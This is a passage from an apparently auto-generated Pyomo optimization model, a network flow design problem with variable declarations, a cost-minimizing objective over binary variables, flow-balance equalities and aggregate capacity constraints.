m.x661 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x662 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x663 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x664 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x665 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x666 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x667 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x668 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x669 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x670 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x671 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x672 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x673 = Var(within=Reals,bounds=(0,None),initialize=0)
m.obj = Objective(expr= 1.090016011*m.b547 + 3.10674202*m.b548 + 2.475702586*m.b549 + 1.966733944*m.b550
+ 1.090016011*m.b551 + 2.019536713*m.b552 + 3.10674202*m.b553 + 1.383540955*m.b554
+ 2.087059045*m.b555 + 3.720443668*m.b556 + 1.383540955*m.b557 + 1.794144217*m.b558
+ 3.50653318*m.b559 + 1.71812596*m.b560 + 3.834780538*m.b561 + 2.087059045*m.b562
+ 1.794144217*m.b563 + 2.239621249*m.b564 + 2.475702586*m.b565 + 2.019536713*m.b566
+ 3.720443668*m.b567 + 3.50653318*m.b568 + 2.239621249*m.b569 + 1.098732406*m.b570
+ 1.742557876*m.b571 + 1.098732406*m.b572 + 3.606882982*m.b573 + 1.71812596*m.b574
+ 2.074958698*m.b575 + 1.966733944*m.b576 + 2.074958698*m.b577 + 3.859970515*m.b578
+ 1.742557876*m.b579 + 3.859970515*m.b580 + 3.951460459*m.b581 + 3.834780538*m.b582
+ 3.606882982*m.b583 + 2.524064089*m.b584 + 2.524064089*m.b585 + 3.982701487*m.b586
+ 3.951460459*m.b587 + 3.982701487*m.b588, sense=minimize)
m.c2 = Constraint(expr= - m.x1 - m.x14 - m.x27 - m.x40 + m.x53 + m.x79 + m.x235 + m.x378 == -148)
m.c3 = Constraint(expr= - m.x2 - m.x15 - m.x28 - m.x41 + m.x54 + m.x80 + m.x236 + m.x379 == 12)
m.c4 = Constraint(expr= - m.x3 - m.x16 - m.x29 - m.x42 + m.x55 + m.x81 + m.x237 + m.x380 == 16)
m.c5 = Constraint(expr= - m.x4 - m.x17 - m.x30 - m.x43 + m.x56 + m.x82 + m.x238 + m.x381 == 21)
m.c6 = Constraint(expr= - m.x5 - m.x18 - m.x31 - m.x44 + m.x57 + m.x83 + m.x239 + m.x382 == 11)
m.c7 = Constraint(expr= - m.x6 - m.x19 - m.x32 - m.x45 + m.x58 + m.x84 + m.x240 + m.x383 == 24)
m.c8 = Constraint(expr= - m.x7 - m.x20 - m.x33 - m.x46 + m.x59 + m.x85 + m.x241 + m.x384 == 24)
m.c9 = Constraint(expr= - m.x8 - m.x21 - m.x34 - m.x47 + m.x60 + m.x86 + m.x242 + m.x385 == 8)
m.c10 = Constraint(expr= - m.x9 - m.x22 - m.x35 - m.x48 + m.x61 + m.x87 + m.x243 + m.x386 == 10)
m.c11 = Constraint(expr= - m.x10 - m.x23 - m.x36 - m.x49 + m.x62 + m.x88 + m.x244 + m.x387 == 18)
m.c12 = Constraint(expr= - m.x11 - m.x24 - m.x37 - m.x50 + m.x63 + m.x89 + m.x245 + m.x388 == 11)
m.c13 = Constraint(expr= - m.x12 - m.x25 - m.x38 - m.x51 + m.x64 + m.x90 + m.x246 + m.x389 == 20)
m.c14 = Constraint(expr= - m.x13 - m.x26 - m.x39 - m.x52 + m.x65 + m.x91 + m.x247 + m.x390 == 7)
m.c15 = Constraint(expr= m.x1 - m.x53 - m.x66 + m.x248 == 7)
m.c16 = Constraint(expr= m.x2 - m.x54 - m.x67 + m.x249 == -175)
m.c17 = Constraint(expr= m.x3 - m.x55 - m.x68 + m.x250 == 15)
m.c18 = Constraint(expr= m.x4 - m.x56 - m.x69 + m.x251 == 17)
m.c19 = Constraint(expr= m.x5 - m.x57 - m.x70 + m.x252 == 20)
m.c20 = Constraint(expr= m.x6 - m.x58 - m.x71 + m.x253 == 24)
m.c21 = Constraint(expr= m.x7 - m.x59 - m.x72 + m.x254 == 6)
m.c22 = Constraint(expr= m.x8 - m.x60 - m.x73 + m.x255 == 19)
m.c23 = Constraint(expr= m.x9 - m.x61 - m.x74 + m.x256 == 24)
m.c24 = Constraint(expr= m.x10 - m.x62 - m.x75 + m.x257 == 11)
m.c25 = Constraint(expr= m.x11 - m.x63 - m.x76 + m.x258 == 15)
m.c26 = Constraint(expr= m.x12 - m.x64 - m.x77 + m.x259 == 9)
m.c27 = Constraint(expr= m.x13 - m.x65 - m.x78 + m.x260 == 19)
m.c28 = Constraint(expr= m.x14 - m.x79 - m.x92 - m.x105 - m.x118 + m.x131 + m.x196 + m.x261 == 15)
m.c29 = Constraint(expr= m.x15 - m.x80 - m.x93 - m.x106 - m.x119 + m.x132 + m.x197 + m.x262 == 13)
m.c30 = Constraint(expr= m.x16 - m.x81 - m.x94 - m.x107 - m.x120 + m.x133 + m.x198 + m.x263 == -231)
m.c31 = Constraint(expr= m.x17 - m.x82 - m.x95 - m.x108 - m.x121 + m.x134 + m.x199 + m.x264 == 23)
m.c32 = Constraint(expr= m.x18 - m.x83 - m.x96 - m.x109 - m.x122 + m.x135 + m.x200 + m.x265 == 18)
m.c33 = Constraint(expr= m.x19 - m.x84 - m.x97 - m.x110 - m.x123 + m.x136 + m.x201 + m.x266 == 19)
m.c34 = Constraint(expr= m.x20 - m.x85 - m.x98 - m.x111 - m.x124 + m.x137 + m.x202 + m.x267 == 9)
m.c35 = Constraint(expr= m.x21 - m.x86 - m.x99 - m.x112 - m.x125 + m.x138 + m.x203 + m.x268 == 8)
m.c36 = Constraint(expr= m.x22 - m.x87 - m.x100 - m.x113 - m.x126 + m.x139 + m.x204 + m.x269 == 16)
m.c37 = Constraint(expr= m.x23 - m.x88 - m.x101 - m.x114 - m.x127 + m.x140 + m.x205 + m.x270 == 19)
m.c38 = Constraint(expr= m.x24 - m.x89 - m.x102 - m.x115 - m.x128 + m.x141 + m.x206 + m.x271 == 19)
m.c39 = Constraint(expr= m.x25 - m.x90 - m.x103 - m.x116 - m.x129 + m.x142 + m.x207 + m.x272 == 21)
m.c40 = Constraint(expr= m.x26 - m.x91 - m.x104 - m.x117 - m.x130 + m.x143 + m.x208 + m.x273 == 8)
m.c41 = Constraint(expr= m.x92 - m.x131 - m.x144 - m.x157 - m.x170 - m.x183 + m.x209 + m.x274 + m.x352 + m.x456 == 12)
m.c42 = Constraint(expr= m.x93 - m.x132 - m.x145 - m.x158 - m.x171 - m.x184 + m.x210 + m.x275 + m.x353 + m.x457 == 20)
m.c43 = Constraint(expr= m.x94 - m.x133 - m.x146 - m.x159 - m.x172 - m.x185 + m.x211 + m.x276 + m.x354 + m.x458 == 23)
m.c44 = Constraint(expr= m.x95 - m.x134 - m.x147 - m.x160 - m.x173 - m.x186 + m.x212 + m.x277 + m.x355 + m.x459
== -187)
m.c45 = Constraint(expr= m.x96 - m.x135 - m.x148 - m.x161 - m.x174 - m.x187 + m.x213 + m.x278 + m.x356 + m.x460 == 21)
m.c46 = Constraint(expr= m.x97 - m.x136 - m.x149 - m.x162 - m.x175 - m.x188 + m.x214 + m.x279 + m.x357 + m.x461 == 12)
m.c47 = Constraint(expr= m.x98 - m.x137 - m.x150 - m.x163 - m.x176 - m.x189 + m.x215 + m.x280 + m.x358 + m.x462 == 6)
m.c48 = Constraint(expr= m.x99 - m.x138 - m.x151 - m.x164 - m.x177 - m.x190 + m.x216 + m.x281 + m.x359 + m.x463 == 11)
m.c49 = Constraint(expr= m.x100 - m.x139 - m.x152 - m.x165 - m.x178 - m.x191 + m.x217 + m.x282 + m.x360 + m.x464
== 19)
m.c50 = Constraint(expr= m.x101 - m.x140 - m.x153 - m.x166 - m.x179 - m.x192 + m.x218 + m.x283 + m.x361 + m.x465 == 9)
m.c51 = Constraint(expr= m.x102 - m.x141 - m.x154 - m.x167 - m.x180 - m.x193 + m.x219 + m.x284 + m.x362 + m.x466
== 17)
m.c52 = Constraint(expr= m.x103 - m.x142 - m.x155 - m.x168 - m.x181 - m.x194 + m.x220 + m.x285 + m.x363 + m.x467
== 23)
m.c53 = Constraint(expr= m.x104 - m.x143 - m.x156 - m.x169 - m.x182 - m.x195 + m.x221 + m.x286 + m.x364 + m.x468
== 21)
m.c54 = Constraint(expr= m.x105 + m.x144 - m.x196 - m.x209 - m.x222 + m.x287 == 14)
m.c55 = Constraint(expr= m.x106 + m.x145 - m.x197 - m.x210 - m.x223 + m.x288 == 7)
m.c56 = Constraint(expr= m.x107 + m.x146 - m.x198 - m.x211 - m.x224 + m.x289 == 22)
m.c57 = Constraint(expr= m.x108 + m.x147 - m.x199 - m.x212 - m.x225 + m.x290 == 14)
m.c58 = Constraint(expr= m.x109 + m.x148 - m.x200 - m.x213 - m.x226 + m.x291 == -170)
m.c59 = Constraint(expr= m.x110 + m.x149 - m.x201 - m.x214 - m.x227 + m.x292 == 12)
m.c60 = Constraint(expr= m.x111 + m.x150 - m.x202 - m.x215 - m.x228 + m.x293 == 13)
m.c61 = Constraint(expr= m.x112 + m.x151 - m.x203 - m.x216 - m.x229 + m.x294 == 10)
m.c62 = Constraint(expr= m.x113 + m.x152 - m.x204 - m.x217 - m.x230 + m.x295 == 15)
m.c63 = Constraint(expr= m.x114 + m.x153 - m.x205 - m.x218 - m.x231 + m.x296 == 9)
m.c64 = Constraint(expr= m.x115 + m.x154 - m.x206 - m.x219 - m.x232 + m.x297 == 14)
m.c65 = Constraint(expr= m.x116 + m.x155 - m.x207 - m.x220 - m.x233 + m.x298 == 16)
m.c66 = Constraint(expr= m.x117 + m.x156 - m.x208 - m.x221 - m.x234 + m.x299 == 8)
m.c67 = Constraint(expr= m.x27 + m.x66 + m.x118 + m.x157 + m.x222 - m.x235 - m.x248 - m.x261 - m.x274 - m.x287
- m.x300 - m.x313 + m.x326 + m.x417 == 13)
m.c68 = Constraint(expr= m.x28 + m.x67 + m.x119 + m.x158 + m.x223 - m.x236 - m.x249 - m.x262 - m.x275 - m.x288
- m.x301 - m.x314 + m.x327 + m.x418 == 22)
m.c69 = Constraint(expr= m.x29 + m.x68 + m.x120 + m.x159 + m.x224 - m.x237 - m.x250 - m.x263 - m.x276 - m.x289
- m.x302 - m.x315 + m.x328 + m.x419 == 23)
m.c70 = Constraint(expr= m.x30 + m.x69 + m.x121 + m.x160 + m.x225 - m.x238 - m.x251 - m.x264 - m.x277 - m.x290
- m.x303 - m.x316 + m.x329 + m.x420 == 7)
m.c71 = Constraint(expr= m.x31 + m.x70 + m.x122 + m.x161 + m.x226 - m.x239 - m.x252 - m.x265 - m.x278 - m.x291
- m.x304 - m.x317 + m.x330 + m.x421 == 16)
m.c72 = Constraint(expr= m.x32 + m.x71 + m.x123 + m.x162 + m.x227 - m.x240 - m.x253 - m.x266 - m.x279 - m.x292
- m.x305 - m.x318 + m.x331 + m.x422 == -169)
m.c73 = Constraint(expr= m.x33 + m.x72 + m.x124 + m.x163 + m.x228 - m.x241 - m.x254 - m.x267 - m.x280 - m.x293
- m.x306 - m.x319 + m.x332 + m.x423 == 20)
m.c74 = Constraint(expr= m.x34 + m.x73 + m.x125 + m.x164 + m.x229 - m.x242 - m.x255 - m.x268 - m.x281 - m.x294
- m.x307 - m.x320 + m.x333 + m.x424 == 14)
m.c75 = Constraint(expr= m.x35 + m.x74 + m.x126 + m.x165 + m.x230 - m.x243 - m.x256 - m.x269 - m.x282 - m.x295
- m.x308 - m.x321 + m.x334 + m.x425 == 11)
m.c76 = Constraint(expr= m.x36 + m.x75 + m.x127 + m.x166 + m.x231 - m.x244 - m.x257 - m.x270 - m.x283 - m.x296
- m.x309 - m.x322 + m.x335 + m.x426 == 13)
m.c77 = Constraint(expr= m.x37 + m.x76 + m.x128 + m.x167 + m.x232 - m.x245 - m.x258 - m.x271 - m.x284 - m.x297
- m.x310 - m.x323 + m.x336 + m.x427 == 10)
m.c78 = Constraint(expr= m.x38 + m.x77 + m.x129 + m.x168 + m.x233 - m.x246 - m.x259 - m.x272 - m.x285 - m.x298
- m.x311 - m.x324 + m.x337 + m.x428 == 13)
m.c79 = Constraint(expr= m.x39 + m.x78 + m.x130 + m.x169 + m.x234 - m.x247 - m.x260 - m.x273 - m.x286 - m.x299
- m.x312 - m.x325 + m.x338 + m.x429 == 12)
m.c80 = Constraint(expr= m.x300 - m.x326 - m.x339 + m.x469 == 6)
m.c81 = Constraint(expr= m.x301 - m.x327 - m.x340 + m.x470 == 16)
m.c82 = Constraint(expr= m.x302 - m.x328 - m.x341 + m.x471 == 22)
m.c83 = Constraint(expr= m.x303 - m.x329 - m.x342 + m.x472 == 9)
m.c84 = Constraint(expr= m.x304 - m.x330 - m.x343 + m.x473 == 13)
m.c85 = Constraint(expr= m.x305 - m.x331 - m.x344 + m.x474 == 7)
m.c86 = Constraint(expr= m.x306 - m.x332 - m.x345 + m.x475 == -156)
m.c87 = Constraint(expr= m.x307 - m.x333 - m.x346 + m.x476 == 20)
m.c88 = Constraint(expr= m.x308 - m.x334 - m.x347 + m.x477 == 19)
m.c89 = Constraint(expr= m.x309 - m.x335 - m.x348 + m.x478 == 24)
m.c90 = Constraint(expr= m.x310 - m.x336 - m.x349 + m.x479 == 8)
m.c91 = Constraint(expr= m.x311 - m.x337 - m.x350 + m.x480 == 21)
m.c92 = Constraint(expr= m.x312 - m.x338 - m.x351 + m.x481 == 6)
m.c93 = Constraint(expr= m.x170 - m.x352 - m.x365 + m.x391 == 15)
m.c94 = Constraint(expr= m.x171 - m.x353 - m.x366 + m.x392 == 15)
m.c95 = Constraint(expr= m.x172 - m.x354 - m.x367 + m.x393 == 23)
m.c96 = Constraint(expr= m.x173 - m.x355 - m.x368 + m.x394 == 25)
m.c97 = Constraint(expr= m.x174 - m.x356 - m.x369 + m.x395 == 20)
m.c98 = Constraint(expr= m.x175 - m.x357 - m.x370 + m.x396 == 7)
m.c99 = Constraint(expr= m.x176 - m.x358 - m.x371 + m.x397 == 19)
m.c100 = Constraint(expr= m.x177 - m.x359 - m.x372 + m.x398 == -177)
m.c101 = Constraint(expr= m.x178 - m.x360 - m.x373 + m.x399 == 7)
m.c102 = Constraint(expr= m.x179 - m.x361 - m.x374 + m.x400 == 18)
m.c103 = Constraint(expr= m.x180 - m.x362 - m.x375 + m.x401 == 25)
m.c104 = Constraint(expr= m.x181 - m.x363 - m.x376 + m.x402 == 20)
m.c105 = Constraint(expr= m.x182 - m.x364 - m.x377 + m.x403 == 18)
m.c106 = Constraint(expr= m.x40 + m.x365 - m.x378 - m.x391 - m.x404 + m.x430 == 8)
m.c107 = Constraint(expr= m.x41 + m.x366 - m.x379 - m.x392 - m.x405 + m.x431 == 11)
m.c108 = Constraint(expr= m.x42 + m.x367 - m.x380 - m.x393 - m.x406 + m.x432 == 23)
m.c109 = Constraint(expr= m.x43 + m.x368 - m.x381 - m.x394 - m.x407 + m.x433 == 7)
m.c110 = Constraint(expr= m.x44 + m.x369 - m.x382 - m.x395 - m.x408 + m.x434 == 5)
m.c111 = Constraint(expr= m.x45 + m.x370 - m.x383 - m.x396 - m.x409 + m.x435 == 15)
m.c112 = Constraint(expr= m.x46 + m.x371 - m.x384 - m.x397 - m.x410 + m.x436 == 7)
m.c113 = Constraint(expr= m.x47 + m.x372 - m.x385 - m.x398 - m.x411 + m.x437 == 10)
m.c114 = Constraint(expr= m.x48 + m.x373 - m.x386 - m.x399 - m.x412 + m.x438 == -179)
m.c115 = Constraint(expr= m.x49 + m.x374 - m.x387 - m.x400 - m.x413 + m.x439 == 20)
m.c116 = Constraint(expr= m.x50 + m.x375 - m.x388 - m.x401 - m.x414 + m.x440 == 18)
m.c117 = Constraint(expr= m.x51 + m.x376 - m.x389 - m.x402 - m.x415 + m.x441 == 8)
m.c118 = Constraint(expr= m.x52 + m.x377 - m.x390 - m.x403 - m.x416 + m.x442 == 12)
m.c119 = Constraint(expr= m.x313 + m.x404 - m.x417 - m.x430 - m.x443 + m.x521 == 9)
m.c120 = Constraint(expr= m.x314 + m.x405 - m.x418 - m.x431 - m.x444 + m.x522 == 12)
m.c121 = Constraint(expr= m.x315 + m.x406 - m.x419 - m.x432 - m.x445 + m.x523 == 24)
m.c122 = Constraint(expr= m.x316 + m.x407 - m.x420 - m.x433 - m.x446 + m.x524 == 21)
m.c123 = Constraint(expr= m.x317 + m.x408 - m.x421 - m.x434 - m.x447 + m.x525 == 8)
m.c124 = Constraint(expr= m.x318 + m.x409 - m.x422 - m.x435 - m.x448 + m.x526 == 9)
m.c125 = Constraint(expr= m.x319 + m.x410 - m.x423 - m.x436 - m.x449 + m.x527 == 11)
m.c126 = Constraint(expr= m.x320 + m.x411 - m.x424 - m.x437 - m.x450 + m.x528 == 13)
m.c127 = Constraint(expr= m.x321 + m.x412 - m.x425 - m.x438 - m.x451 + m.x529 == 11)
m.c128 = Constraint(expr= m.x322 + m.x413 - m.x426 - m.x439 - m.x452 + m.x530 == -183)
m.c129 = Constraint(expr= m.x323 + m.x414 - m.x427 - m.x440 - m.x453 + m.x531 == 16)
m.c130 = Constraint(expr= m.x324 + m.x415 - m.x428 - m.x441 - m.x454 + m.x532 == 14)
m.c131 = Constraint(expr= m.x325 + m.x416 - m.x429 - m.x442 - m.x455 + m.x533 == 17)
m.c132 = Constraint(expr= m.x183 + m.x339 - m.x456 - m.x469 - m.x482 + m.x495 == 22)
m.c133 = Constraint(expr= m.x184 + m.x340 - m.x457 - m.x470 - m.x483 + m.x496 == 12)
m.c134 = Constraint(expr= m.x185 + m.x341 - m.x458 - m.x471 - m.x484 + m.x497 == 7)
m.c135 = Constraint(expr= m.x186 + m.x342 - m.x459 - m.x472 - m.x485 + m.x498 == 12)
m.c136 = Constraint(expr= m.x187 + m.x343 - m.x460 - m.x473 - m.x486 + m.x499 == 12)
m.c137 = Constraint(expr= m.x188 + m.x344 - m.x461 - m.x474 - m.x487 + m.x500 == 10)
m.c138 = Constraint(expr= m.x189 + m.x345 - m.x462 - m.x475 - m.x488 + m.x501 == 11)
m.c139 = Constraint(expr= m.x190 + m.x346 - m.x463 - m.x476 - m.x489 + m.x502 == 17)
m.c140 = Constraint(expr= m.x191 + m.x347 - m.x464 - m.x477 - m.x490 + m.x503 == 17)
m.c141 = Constraint(expr= m.x192 + m.x348 - m.x465 - m.x478 - m.x491 + m.x504 == 12)
m.c142 = Constraint(expr= m.x193 + m.x349 - m.x466 - m.x479 - m.x492 + m.x505 == -185)
m.c143 = Constraint(expr= m.x194 + m.x350 - m.x467 - m.x480 - m.x493 + m.x506 == 10)
m.c144 = Constraint(expr= m.x195 + m.x351 - m.x468 - m.x481 - m.x494 + m.x507 == 21)
m.c145 = Constraint(expr= m.x482 - m.x495 - m.x508 + m.x534 == 8)
m.c146 = Constraint(expr= m.x483 - m.x496 - m.x509 + m.x535 == 20)
m.c147 = Constraint(expr= m.x484 - m.x497 - m.x510 + m.x536 == 23)
m.c148 = Constraint(expr= m.x485 - m.x498 - m.x511 + m.x537 == 18)
m.c149 = Constraint(expr= m.x486 - m.x499 - m.x512 + m.x538 == 15)
m.c150 = Constraint(expr= m.x487 - m.x500 - m.x513 + m.x539 == 22)
m.c151 = Constraint(expr= m.x488 - m.x501 - m.x514 + m.x540 == 17)
m.c152 = Constraint(expr= m.x489 - m.x502 - m.x515 + m.x541 == 24)
m.c153 = Constraint(expr= m.x490 - m.x503 - m.x516 + m.x542 == 7)
m.c154 = Constraint(expr= m.x491 - m.x504 - m.x517 + m.x543 == 16)
m.c155 = Constraint(expr= m.x492 - m.x505 - m.x518 + m.x544 == 24)
m.c156 = Constraint(expr= m.x493 - m.x506 - m.x519 + m.x545 == -200)
m.c157 = Constraint(expr= m.x494 - m.x507 - m.x520 + m.x546 == 8)
m.c158 = Constraint(expr= m.x443 + m.x508 - m.x521 - m.x534 == 19)
m.c159 = Constraint(expr= m.x444 + m.x509 - m.x522 - m.x535 == 15)
m.c160 = Constraint(expr= m.x445 + m.x510 - m.x523 - m.x536 == 10)
m.c161 = Constraint(expr= m.x446 + m.x511 - m.x524 - m.x537 == 13)
m.c162 = Constraint(expr= m.x447 + m.x512 - m.x525 - m.x538 == 11)
m.c163 = Constraint(expr= m.x448 + m.x513 - m.x526 - m.x539 == 8)
m.c164 = Constraint(expr= m.x449 + m.x514 - m.x527 - m.x540 == 13)
m.c165 = Constraint(expr= m.x450 + m.x515 - m.x528 - m.x541 == 23)
m.c166 = Constraint(expr= m.x451 + m.x516 - m.x529 - m.x542 == 23)
m.c167 = Constraint(expr= m.x452 + m.x517 - m.x530 - m.x543 == 14)
m.c168 = Constraint(expr= m.x453 + m.x518 - m.x531 - m.x544 == 8)
m.c169 = Constraint(expr= m.x454 + m.x519 - m.x532 - m.x545 == 25)
m.c170 = Constraint(expr= m.x455 + m.x520 - m.x533 - m.x546 == -157)
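# Editor's note (added for readability; inferred from structure, not from the
# original source): the equality constraints above read like node flow-balance
# rows, while c171-c212 below define aggregate variables m.x632..m.x673 as
# upper bounds on 13-variable blocks of flows (-sum(block) + x_agg >= 0,
# i.e. x_agg >= sum(block)).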
m.c171 = Constraint(expr= - m.x1 - m.x2 - m.x3 - m.x4 - m.x5 - m.x6 - m.x7 - m.x8 - m.x9 - m.x10 - m.x11 - m.x12 - m.x13
+ m.x632 >= 0)
m.c172 = Constraint(expr= - m.x14 - m.x15 - m.x16 - m.x17 - m.x18 - m.x19 - m.x20 - m.x21 - m.x22 - m.x23 - m.x24
- m.x25 - m.x26 + m.x633 >= 0)
m.c173 = Constraint(expr= - m.x27 - m.x28 - m.x29 - m.x30 - m.x31 - m.x32 - m.x33 - m.x34 - m.x35 - m.x36 - m.x37
- m.x38 - m.x39 + m.x634 >= 0)
m.c174 = Constraint(expr= - m.x40 - m.x41 - m.x42 - m.x43 - m.x44 - m.x45 - m.x46 - m.x47 - m.x48 - m.x49 - m.x50
- m.x51 - m.x52 + m.x635 >= 0)
m.c175 = Constraint(expr= - m.x53 - m.x54 - m.x55 - m.x56 - m.x57 - m.x58 - m.x59 - m.x60 - m.x61 - m.x62 - m.x63
- m.x64 - m.x65 + m.x636 >= 0)
m.c176 = Constraint(expr= - m.x66 - m.x67 - m.x68 - m.x69 - m.x70 - m.x71 - m.x72 - m.x73 - m.x74 - m.x75 - m.x76
- m.x77 - m.x78 + m.x637 >= 0)
m.c177 = Constraint(expr= - m.x79 - m.x80 - m.x81 - m.x82 - m.x83 - m.x84 - m.x85 - m.x86 - m.x87 - m.x88 - m.x89
- m.x90 - m.x91 + m.x638 >= 0)
m.c178 = Constraint(expr= - m.x92 - m.x93 - m.x94 - m.x95 - m.x96 - m.x97 - m.x98 - m.x99 - m.x100 - m.x101 - m.x102
- m.x103 - m.x104 + m.x639 >= 0)
m.c179 = Constraint(expr= - m.x105 - m.x106 - m.x107 - m.x108 - m.x109 - m.x110 - m.x111 - m.x112 - m.x113 - m.x114
- m.x115 - m.x116 - m.x117 + m.x640 >= 0)
m.c180 = Constraint(expr= - m.x118 - m.x119 - m.x120 - m.x121 - m.x122 - m.x123 - m.x124 - m.x125 - m.x126 - m.x127
- m.x128 - m.x129 - m.x130 + m.x641 >= 0)
m.c181 = Constraint(expr= - m.x131 - m.x132 - m.x133 - m.x134 - m.x135 - m.x136 - m.x137 - m.x138 - m.x139 - m.x140
- m.x141 - m.x142 - m.x143 + m.x642 >= 0)
m.c182 = Constraint(expr= - m.x144 - m.x145 - m.x146 - m.x147 - m.x148 - m.x149 - m.x150 - m.x151 - m.x152 - m.x153
- m.x154 - m.x155 - m.x156 + m.x643 >= 0)
m.c183 = Constraint(expr= - m.x157 - m.x158 - m.x159 - m.x160 - m.x161 - m.x162 - m.x163 - m.x164 - m.x165 - m.x166
- m.x167 - m.x168 - m.x169 + m.x644 >= 0)
m.c184 = Constraint(expr= - m.x170 - m.x171 - m.x172 - m.x173 - m.x174 - m.x175 - m.x176 - m.x177 - m.x178 - m.x179
- m.x180 - m.x181 - m.x182 + m.x645 >= 0)
m.c185 = Constraint(expr= - m.x183 - m.x184 - m.x185 - m.x186 - m.x187 - m.x188 - m.x189 - m.x190 - m.x191 - m.x192
- m.x193 - m.x194 - m.x195 + m.x646 >= 0)
m.c186 = Constraint(expr= - m.x196 - m.x197 - m.x198 - m.x199 - m.x200 - m.x201 - m.x202 - m.x203 - m.x204 - m.x205
- m.x206 - m.x207 - m.x208 + m.x647 >= 0)
m.c187 = Constraint(expr= - m.x209 - m.x210 - m.x211 - m.x212 - m.x213 - m.x214 - m.x215 - m.x216 - m.x217 - m.x218
- m.x219 - m.x220 - m.x221 + m.x648 >= 0)
m.c188 = Constraint(expr= - m.x222 - m.x223 - m.x224 - m.x225 - m.x226 - m.x227 - m.x228 - m.x229 - m.x230 - m.x231
- m.x232 - m.x233 - m.x234 + m.x649 >= 0)
m.c189 = Constraint(expr= - m.x235 - m.x236 - m.x237 - m.x238 - m.x239 - m.x240 - m.x241 - m.x242 - m.x243 - m.x244
- m.x245 - m.x246 - m.x247 + m.x650 >= 0)
m.c190 = Constraint(expr= - m.x248 - m.x249 - m.x250 - m.x251 - m.x252 - m.x253 - m.x254 - m.x255 - m.x256 - m.x257
- m.x258 - m.x259 - m.x260 + m.x651 >= 0)
m.c191 = Constraint(expr= - m.x261 - m.x262 - m.x263 - m.x264 - m.x265 - m.x266 - m.x267 - m.x268 - m.x269 - m.x270
- m.x271 - m.x272 - m.x273 + m.x652 >= 0)
m.c192 = Constraint(expr= - m.x274 - m.x275 - m.x276 - m.x277 - m.x278 - m.x279 - m.x280 - m.x281 - m.x282 - m.x283
- m.x284 - m.x285 - m.x286 + m.x653 >= 0)
m.c193 = Constraint(expr= - m.x287 - m.x288 - m.x289 - m.x290 - m.x291 - m.x292 - m.x293 - m.x294 - m.x295 - m.x296
- m.x297 - m.x298 - m.x299 + m.x654 >= 0)
m.c194 = Constraint(expr= - m.x300 - m.x301 - m.x302 - m.x303 - m.x304 - m.x305 - m.x306 - m.x307 - m.x308 - m.x309
- m.x310 - m.x311 - m.x312 + m.x655 >= 0)
m.c195 = Constraint(expr= - m.x313 - m.x314 - m.x315 - m.x316 - m.x317 - m.x318 - m.x319 - m.x320 - m.x321 - m.x322
- m.x323 - m.x324 - m.x325 + m.x656 >= 0)
m.c196 = Constraint(expr= - m.x326 - m.x327 - m.x328 - m.x329 - m.x330 - m.x331 - m.x332 - m.x333 - m.x334 - m.x335
- m.x336 - m.x337 - m.x338 + m.x657 >= 0)
m.c197 = Constraint(expr= - m.x339 - m.x340 - m.x341 - m.x342 - m.x343 - m.x344 - m.x345 - m.x346 - m.x347 - m.x348
- m.x349 - m.x350 - m.x351 + m.x658 >= 0)
m.c198 = Constraint(expr= - m.x352 - m.x353 - m.x354 - m.x355 - m.x356 - m.x357 - m.x358 - m.x359 - m.x360 - m.x361
- m.x362 - m.x363 - m.x364 + m.x659 >= 0)
m.c199 = Constraint(expr= - m.x365 - m.x366 - m.x367 - m.x368 - m.x369 - m.x370 - m.x371 - m.x372 - m.x373 - m.x374
- m.x375 - m.x376 - m.x377 + m.x660 >= 0)
m.c200 = Constraint(expr= - m.x378 - m.x379 - m.x380 - m.x381 - m.x382 - m.x383 - m.x384 - m.x385 - m.x386 - m.x387
- m.x388 - m.x389 - m.x390 + m.x661 >= 0)
m.c201 = Constraint(expr= - m.x391 - m.x392 - m.x393 - m.x394 - m.x395 - m.x396 - m.x397 - m.x398 - m.x399 - m.x400
- m.x401 - m.x402 - m.x403 + m.x662 >= 0)
m.c202 = Constraint(expr= - m.x404 - m.x405 - m.x406 - m.x407 - m.x408 - m.x409 - m.x410 - m.x411 - m.x412 - m.x413
- m.x414 - m.x415 - m.x416 + m.x663 >= 0)
m.c203 = Constraint(expr= - m.x417 - m.x418 - m.x419 - m.x420 - m.x421 - m.x422 - m.x423 - m.x424 - m.x425 - m.x426
- m.x427 - m.x428 - m.x429 + m.x664 >= 0)
m.c204 = Constraint(expr= - m.x430 - m.x431 - m.x432 - m.x433 - m.x434 - m.x435 - m.x436 - m.x437 - m.x438 - m.x439
- m.x440 - m.x441 - m.x442 + m.x665 >= 0)
m.c205 = Constraint(expr= - m.x443 - m.x444 - m.x445 - m.x446 - m.x447 - m.x448 - m.x449 - m.x450 - m.x451 - m.x452
- m.x453 - m.x454 - m.x455 + m.x666 >= 0)
m.c206 = Constraint(expr= - m.x456 - m.x457 - m.x458 - m.x459 - m.x460 - m.x461 - m.x462 - m.x463 - m.x464 - m.x465
- m.x466 - m.x467 - m.x468 + m.x667 >= 0)
m.c207 = Constraint(expr= - m.x469 - m.x470 - m.x471 - m.x472 - m.x473 - m.x474 - m.x475 - m.x476 - m.x477 - m.x478
- m.x479 - m.x480 - m.x481 + m.x668 >= 0)
m.c208 = Constraint(expr= - m.x482 - m.x483 - m.x484 - m.x485 - m.x486 - m.x487 - m.x488 - m.x489 - m.x490 - m.x491
- m.x492 - m.x493 - m.x494 + m.x669 >= 0)
m.c209 = Constraint(expr= - m.x495 - m.x496 - m.x497 - m.x498 - m.x499 - m.x500 - m.x501 - m.x502 - m.x503 - m.x504
- m.x505 - m.x506 - m.x507 + m.x670 >= 0)
m.c210 = Constraint(expr= - m.x508 - m.x509 - m.x510 - m.x511 - m.x512 - m.x513 - m.x514 - m.x515 - m.x516 - m.x517
- m.x518 - m.x519 - m.x520 + m.x671 >= 0)
m.c211 = Constraint(expr= - m.x521 - m.x522 - m.x523 - m.x524 - m.x525 - m.x526 - m.x527 - m.x528 - m.x529 - m.x530
- m.x531 - m.x532 - m.x533 + m.x672 >= 0)
